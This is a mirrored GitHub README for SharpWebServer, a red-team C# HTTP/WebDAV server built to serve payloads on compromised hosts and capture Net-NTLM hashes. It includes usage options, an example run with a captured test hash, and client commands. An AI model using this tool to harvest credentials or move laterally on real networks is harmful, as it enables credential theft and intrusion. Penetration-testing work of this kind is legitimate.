Giter Site home page Giter Site logo

david0718 / sharpwebserver Goto Github PK

View Code? Open in Web Editor NEW

This project forked from mgeeky/sharpwebserver

0.0 1.0 0.0 59 KB

Red Team oriented C# Simple HTTP & WebDAV Server with Net-NTLM hashes capture functionality

License: GNU General Public License v3.0

C# 100.00%

sharpwebserver's Introduction

SharpWebServer

A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes. To be used for serving payloads on compromised machines for lateral movement purposes.

Requires .NET Framework 4.5 and System.Net and System.Net.Sockets references.

Usage

    :: SharpWebServer ::
    a Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality

Authors:
    - Can Güney Aksakalli (github.com/aksakalli)          - original implementation
    - harrypatrick442 (github.com/harrypatrick442)        - aksakalli's fork & changes
    - Dominic Chell (@domchell) from MDSec                - Net-NTLMv2 hashes capture code borrowed from Farmer
    - Mariusz Banach / mgeeky, <mb [at] binary-offensive.com> - combined all building blocks together,
                                                            added connection keep-alive to NTLM Authentication

Usage:
    SharpWebServer.exe <port=port> [dir=path] [verbose=true] [ntlm=true] [logfile=path]

Options:
    port    - TCP Port number on which to listen (1-65535)
    dir     - Directory with files to be hosted.
    verbose - Turn verbose mode on.
    seconds - Specifies how long should the server be running. Default: indefinitely
    ntlm    - Require NTLM Authentication before serving files. Useful to collect NetNTLMv2 hashes
              (in MDSec's Farmer style)
    logfile - Path to output logfile.

Example

Example use-case serving files and capturing Net-NTLM hashes at the same time:

Server:

C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true

    :: SharpWebServer ::
    a Red Team oriented C# Simple HTTP & WebDAV Server with Net-NTLM hashes capture functionality

[.] Serving HTTP server on port  : 8888
[.] Will run for this long       : 60 seconds
[.] Verbose mode turned on.
[.] NTLM mode turned on.
[.] Serving files from directory : C:\Windows\Temp

SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized due to lack of Authorization header.
SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401)
SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized with NTLM Challenge Response.
SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401)

[+] SharpWebServer: Net-NTLM hash captured:
TestUser:::1122334455667788:66303EE2DF9417E2FE07E1B7FD663205:010100000000000092EC04E8B324D701C2B561D5FECBB325000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000010000000020000045E18A336DA58F5F0F826F846C699F77DCCF02BA5135525AC52EFBB0C0A1F1160A0010000000000000000000000000000000000009001C0048005400540050002F006C006F00630061006C0068006F00730074000000000000000000

SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)

Client:

C:\> curl -sD- http://localhost:8888/test.txt --ntlm --negotiate -u TestUser:TestPassword
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
WWW-Authenticate: NTLM
Date: Mon, 29 Mar 2021 15:55:14 GMT

HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
WWW-Authenticate: NTLM TlRMTVNTUAACAAAABgAGADgAAAAFAomiESIzRFVmd4gAAAAAAAAAAIAAgAA+AAAABQLODgAAAA9TAE0AQgACAAYAUwBNAEIAAQAWAFMATQBCAC0AVABPAE8ATABLAEkAVAAEABIAcwBtAGIALgBsAG8AYwBhAGwAAwAoAHMAZQByAHYAZQByADIAMAAwADMALgBzAG0AYgAuAGwAbwBjAGEAbAAFABIAcwBtAGIALgBsAG8AYwBhAGwAAAAAAA==
Date: Mon, 29 Mar 2021 15:55:14 GMT

HTTP/1.1 200 OK
Content-Length: 6
Content-Type: text/plain
Date: Mon, 29 Mar 2021 15:55:14 GMT

foobar

WebDAV client:

C:\> dir \\localhost@8888\test
 Volume in drive \\localhost@8888\test has no label.
 Volume Serial Number is 0000-0000

 Directory of \\localhost@8888\test

30.03.2021  05:12    <DIR>          .
30.03.2021  05:12    <DIR>          ..
30.03.2021  04:27                11 test2.txt
30.03.2021  05:12                12 test3.txt
30.03.2021  05:12    <DIR>          test4
               2 File(s)             23 bytes
               3 Dir(s)  225 268 776 960 bytes free

C:\> type \\localhost@8888\test\test4\test5.txt
Hello world!

C:\> copy \\localhost@8888\test\test4\test5.txt .
        1 file(s) copied.

Authors

  • NTLM hashes capture code & TCP Listener backbone borrowed from MDSec ActiveBreach Farmer project written by Dominic Chell (@domchell):

  • WebDAV implementation, NTLM Authentication keep-alive logic & all the rest Mariusz Banach / mgeeky, '21, <mb [at] binary-offensive.com>

☕ Show Support ☕

This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you! 💪

   Mariusz Banach / mgeeky, 21
   <mb [at] binary-offensive.com>
   (https://github.com/mgeeky)

sharpwebserver's People

Contributors

mgeeky avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.